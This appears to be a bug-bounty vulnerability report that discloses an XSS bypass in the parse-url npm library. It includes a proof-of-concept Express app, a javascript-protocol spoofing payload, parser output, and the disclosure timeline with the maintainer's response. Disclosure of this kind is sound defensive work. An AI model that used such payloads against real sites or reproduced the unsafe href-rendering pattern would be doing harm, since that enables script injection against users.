Cross Site Scripting via Improper Input Validation in ionicabizau/parse-url
Valid
Reported on
Jun 11th 2022
Description
The parse-url The 5.0.8 version of the parser does not check ://
character between protocols. This causes spoofing of the javascript protocol itself. Additionally, protocol spoofing does not occur in url-parse, new URL(), and url.parse() other than parse-url.
Proof of Concept
const parseUrl = require("parse-url");
const express = require('express');
const app = express();
parsed = parseUrl("javascript:/://alert(1)");
console.log(parsed);
app.get('/', (req, res) => {
if (parsed.protocol !== "javascript") {
res.send("<a href=\'" + parsed.href + "\'>CLICK ME!</a>")
}
})
app.listen(9999);
In general, the above express code forbids the javascript protocol. However, you can spoof this using the ://
character
output console.log(parsed);
{
protocols: [ 'javascript:/' ],
protocol: 'javascript:/',
port: null,
resource: 'alert(1)',
user: '',
pathname: '',
hash: '',
search: '',
href: 'javascript:/://alert(1)',
query: [Object: null prototype] {}
}
output : document in browser
<a href="javascript:/://alert(1)">CLICK ME!</a>
Other module stability
~/Desktop/npm-research/test
❯ node -e "const parser = require('url-parse');console.log(parser('javascript:/://alert()'))"
{
slashes: false,
protocol: 'javascript:',
hash: '',
query: '',
pathname: '/://alert()',
auth: '',
host: '',
port: '',
hostname: '',
password: '',
username: '',
origin: 'null',
href: 'javascript:/://alert()'
}
~/Desktop/npm-research/test
❯ node -e 'console.log(new URL("javascript:/://alert()"))'
URL {
href: 'javascript:/://alert()',
origin: 'null',
protocol: 'javascript:',
username: '',
password: '',
host: '',
hostname: '',
port: '',
pathname: '/://alert()',
search: '',
searchParams: URLSearchParams {},
hash: ''
}
In the two famous modules, javascript spoofing does not occur, so XSS does not occur.
Impact
Through this vulnerability, an attacker is capable to execute malicious scripts.
We are processing your report and will contact the
ionicabizau/parse-url
team within 24 hours.
2 months ago
We have contacted a member of the
ionicabizau/parse-url
team and are waiting to hear back
2 months ago
We have sent a
follow up to the
ionicabizau/parse-url
team.
We will try again in 7 days.
2 months ago
We have sent a
second
follow up to the
ionicabizau/parse-url
team.
We will try again in 10 days.
a month ago
Hi there! Sorry for the late reply and thank you for this report. I am working on fixing this.
The researcher's credibility has increased: +7
Ionică Bizău (Johnny B.)
has been awarded the fix bounty
to join this conversation